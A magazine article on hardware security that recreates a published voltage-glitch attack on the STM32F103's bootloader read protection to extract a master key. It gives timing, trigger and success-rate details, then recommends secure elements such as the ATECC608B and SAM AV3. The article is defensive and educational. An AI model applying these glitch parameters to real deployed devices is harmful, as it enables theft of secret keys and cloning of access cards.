Take a look at a specific device that relied on an older STM32F1 device to store sensitive security keys. We recreate existing work showing the vulnerability and then look at how we could make the system more secure.
Irecently was involved with a project using an STM32F103 microcontroller, where the security of a system relied on the “code read protection” features of this microcontroller. This happened because a critical encryption key was stored in the flash memory. The system in question used the architecture shown in Figure 1. At a high level, this system used a secure smart card to store some trusted application data. To avoid simple attacks, the cards use unique keys per card (and even per memory segment as in the card here). This means the reader needs a way of figuring out the encryption key in use with the card. With a shared encryption key, the reader application can generate a secure channel to read the application data without someone sniffing the data.
Ideally, we’d solve this problem with public-key cryptography, which would allow the reader to validate the card came from a trusted source, and then we could perform a key exchange without relying on some secret master key. But as with many high constrained systems, we don’t get everything we want, so instead, it relies on a key diversification function. This takes a secret master key and uses some combination of card ID and other features to determine a unique diversified key. The problem here is we now need to handle a master key, that key will be shared among some group of cards. In my case, it meant the security of the system rested on the code read protection of the STM32F1 microcontroller storing the master key along with the key diversification function.
I’ve discussed the ability to bypass code read protection on other devices, such as demonstrating how the code read protection of the NXP LPC1114 could be bypassed in the “Recreating Code Protection Bypass: An LPC MCU Attack” (Circuit Cellar #338, September 2018 issue) . I previously touched on the STM32F series in particular in the “Verifying Code Readout Protection Claims” (Circuit Cellar #336, July 2018 issue) , where I discussed how a glitch might be applied, but never actually tested this on hardware. In this article, I’m going to show you how I picked up on my previous work and finished the actual attack. It also provides proof of my claim from the previous article – we don’t always need to even do the full attack to convince ourselves that there could be a problem!
STANDING ON THE SHOULDERS OF GIANTS
For the STM32F1 in particular, I had several examples of successful attacks to reference. The most important was a paper called “Shaping the Glitch”  from 2019, which detailed an attack on the same STM32F103 device. The demonstration I’ll be doing is effectively recreating this work, so I’m not introducing any new vulnerability in this article.
But if you wanted more examples, several other references also show attacks on this device. Mark C. had posted an example of performing this attack using a low-cost ice40 FPGA board in 2018 , and a separate blog post titled “Read secure firmware from STM32F1xx flash using ChipWhisperer”  detailed another recreation of this. Examples of similar STM32F devices have been shown in a presentation titled Wallet.Fail and Chip.Fail  . Finally, a recent video by Joe Grand entitled “How I hacked a hardware crypto wallet and recovered $2 million”  shows the usage of an attack on the STM32F2 to recover cryptocurrency stored in a hardware wallet.
Why highlight all these previous examples of this glitch?
I want to emphasize the fact that the code read protection of the STM32F103 device could be bypassed should not be surprising to you. Nor is anything in this column novel – but when it comes to security, I still find people want to treat these issues as if they should be hidden away. Instead, we need to be realistic with our choices of security features and design our systems with the knowledge that code read protection may not stop even a moderately dedicated attacker.
ABOUT READ PROTECTION
As mentioned, I discussed how the STM32 code read protection works in my previous July 2018 column. But as that is now four years ago, you might not remember the details of that column! So, I’ll summarize the important bits here.
The STM32F series uses a specific address in flash memory to hold what is called an “option byte”. Depending on the value of that byte, various features are allowed or disabled. This includes an ability to disable debug (JTAG) access, and an ability to prevent the built-in bootloader from accessing flash memory. The STM32F series has a convenient “permanent” bootloader that cannot be erased. This is great for development & in-field updates, but it also means an attacker will always have access to the bootloader (it requires setting a pin high, so it might require some hardware modifications).
For the STM32F1 the option byte only turns to flash memory protection on or off, later devices such as the STM32F2 can choose if you also want to disable the bootloader and JTAG (but as shown in talks such as Wallet.Fail this can be bypassed). I’ll be using the bootloader to attempt to perform a read from the device. The bootloader flow is shown in Figure 2. You’ll notice that if the read protection is active, the bootloader should respond with a NAK to my read request.
As previously disclosed, we can simply try to insert a glitch after the read request, and we can see if we can get an ACK instead of a NAK. In my July 2018 issue, I tried to check if the glitch might work by simply jumping to the bootloader after the check happened, and this also showed I could dump the memory that way. But I never applied the glitch itself—in this article we’re going to close the loop and prove that indeed the results from four years ago should have made us skeptical of the bootloader security.
GLITCHING TO FREEDOM
In my case, I’m using a crowbar voltage glitch as generated from the ChipWhisperer-Husky (the same attack has been demonstrated with the ChipWhisperer-Lite or ChipWhisperer-Pro, or any other method you come up with). The important information is a question of where the glitch should be inserted, and then how we’ll time that specific location.
Luckily the previous work answered both of these—we need simply to insert it after sending the 0xEE byte as part of the read command. In the blog post referenced on the prog.world (see Resources) a ChipWhisperer-Pro is used, here I’m using a lower-cost ChipWhisperer-Husky. Both allow triggering on a UART byte.
A custom bitstream for the ChipWhisperer-Pro is needed due to the even parity requirement of the bootloader—in performing this example, this modification was the most difficult part of the task! But looking at the example of the waveform from the glitch inserted in Figure 3, you’ll notice that you could also trigger on the first rising edge, allowing this attack to be possible with simpler devices such as the ChipWhisperer-Lite (which requires a rising edge trigger for the glitch). Because the glitch is always triggered from a serial command, the timing will be very consistent.
You could also easily perform this work by using an embedded microcontroller to send the UART commands, a Raspberry Pi Pico for example could be used to implement the bootloader protocol, and because the Raspberry Pi Pico knows when the byte is being sent it has a perfect reference for the trigger. Such a platform would allow the PicoEMP I discussed in my March 2022 issue to be used for implementing this attack as well.
In my example, the setup looks like the one shown in Figure 4. The STM32F1 was removed from the target PCB and placed into a socket, this was required as for entering the bootloader mode a few strapping pins are needed. On the PCB those pins were not available, and it was simply easier to remove the entire chip than it was to modify the PCB. Removing the chip also meant I could perform some basic evaluation on a device I controlled, and I’d be confident that the parameters wouldn’t change very much when simply changing the device in the socket. If you implemented this by modifying the target PCB, there is a chance you’ll need to adjust the parameters due to variations in the target PCB or your modifications of it.
For this glitch, we simply use the bootloader and request a readout of a 256-byte block (the bootloader reads a maximum of 256 bytes at a time). We need to glitch each and every read request. In my example, there is about a 20% success rate on average per glitch. When the glitch fails, we sometimes need to power cycle the device as it fully crashes the bootloader. These crashes slowed us down, but overall reading out the entire 256KB chip took about 4 hours (this means about 1000 successful glitches). This is almost a negligible amount of time when we consider the threat model since with that time investment we recover the master key used by a large group of card readers.
SECURE THE SYSTEM
Now that we’ve seen how the STM32F1 shouldn’t be trusted for critical secrets, what would I change in the design? The single most valuable solution for this system would be to avoid the use of a shared key stored in microcontroller memory.
As mentioned at the beginning of this article, a system using public-key cryptography could keep the sensitive secrets entirely in the smart card device (which is designed to be secure against the types of attacks I am discussing). But if you are working with an already deployed system, you may not be able to redesign the architecture and want to use a shared key more securely. This means ensuring that both sides of the system are equally secure—so matching the secure smart card with a secure “something” in the reader.
The next solution will be to use a secure method of storing the key. But if you pair that secure storage with the same STM32F1, you may still leave the key easily available if you perform the cryptographic operations on the STM32F1. This is because the attacker will simply read out the key from SRAM instead of FLASH memory (and the STM32F1 allows SRAM read access from a debugger, so any key in SRAM is easily available).
An upgrade here would be to at least work with a “crypto offload” product. A popular choice is for example the Atmel ATECC608B, which can perform many operations (including standard AES-ECB) using keys that cannot be easily readout. But as this doesn’t encompass the full key diversification algorithm, there is a risk that an attacker can use an ATECC608B as an “oracle” to generate the diversified key for any given card, without the attacker knowing the secret master key.
The ATECC608B is worth mentioning however for its low cost (less than $1), so the ATECC608B is incredibly good value. In today’s days of chip shortages, it also means you may be able to change your main processor if required since you rely only on the security features of the ATECC608B and not whatever processor you designed at the time. For our specific use case, however, the best solution here would be a purpose-built device that mates with the smart card, such as the NXP SAM AV3 chip. This is designed not as a more general-purpose device, but as a way of solving the “reader security” problem by matching the same level of security present on the smart card as that on the reader.
This offloads the algorithms that are used for the key diversification purpose along with the secure communications algorithms from a microcontroller to the SAM AV3. An attacker could still use a programmed SAM AV3 device as an oracle, but they would be limited to only reading from legitimate cards. This would not allow them to clone the cards, since they have no way of generating the diversified key, and the SAM AV3 is only performing reader functions.
I show this arrangement in Figure 5. You’ll notice I haven’t called the channel between the application & SAM AV3 a secure channel. This is because the STM32F1, as we discovered here, doesn’t have a way of securely storing secrets within it. So building a truly “secure channel” will be a challenge. We could still use encrypted communication between the AV3 and STM32F1 to prevent an attacker from simply sniffing the communication openly, but a dedicated attacker could clone the STM32F1 to fully emulate whatever security mechanisms we implemented inside the STM32F1. Ultimately if we are keeping similar hardware, we are going to accept some level of exposure of the secrets. But exposing the data stored on individual cards seems less serious than exposing the master key shared by a large group of cards.
SECURITY EVALUATION AND YOU
Hopefully, in this article, I’ve given you a bit more of a hands-on example of how you can validate the security of a standard microcontroller, and more importantly the steps you can take to secure your system. The single most important aspect here is a realistic view of the security you’ll accomplish—if you plan from the start to trust only a small part of your design, your overall life will be much easier.
The example here had to trust two devices, both of them accessible to the end-user—the smart card and the reader. While both of these devices are subject to low-level hardware attacks, it turned out the reader device was trivial to attack, negating the excellent security offered by the smart card. If we could change the architecture such that the security key on the reader side was held in a backend system, it would not be accessible to a low-level hardware attack.
Sometimes this isn’t possible, and instead, we need to use devices specifically designed to securely store the secrets. I gave you two examples of them here—the Microchip ATECC608B (useful for many generic purposes), along with the NXP SAM AV3 (targeted more toward a reader interface).
 “Recreating Code Protection Bypass: An LPC MCU Attack” (September 2018 issue)
 “Verifying Code Readout Protection Claims” (July 2018). https://circuitcellar.com/archive-article/verifying-code-readout-protection-claims/
 Claudio Bozzato, Riccardo Focardi, and Francesco Palmarini. “Shaping the Glitch” (2019). https://tches.iacr.org/index.php/TCHES/article/download/7390/6562/
 Mark Cardinal. “Glitching STM32F103 with an iCE40 ‘iCEstick’ FPGA” (2018). https://github.com/unprovable/glitch-stm32
 “Read Secure Firmware from STM32F1xx Flash Using ChipWhisperer”. https://prog.world/read-secure-firmware-from-stm32f1xx-flash-using-chipwhisperer/
 Thomas Roth, Josh Datko, and Dmitry Nedospasov. “Wallet.Fail” (2018). https://wallet.fail
 Thomas Roth, Josh Datko, and Dmitry Nedospasov. “Chip.Fail” (2019). https://chip.fail/
 Joe Grand. “How I hacked a hardware crypto wallet and recovered $2 million” (2022). https://www.youtube.com/watch?v=dT9y-KQbqi4
PUBLISHED IN CIRCUIT CELLAR MAGAZINE • JULY 2022 #384 – Get a PDF of the issueSponsor this Article
Colin O’Flynn has been building and breaking electronic devices for many years. He is an assistant professor at Dalhousie University, and also CTO of NewAE Technology both based in Halifax, NS, Canada. Some of his work is posted on his website (see link above).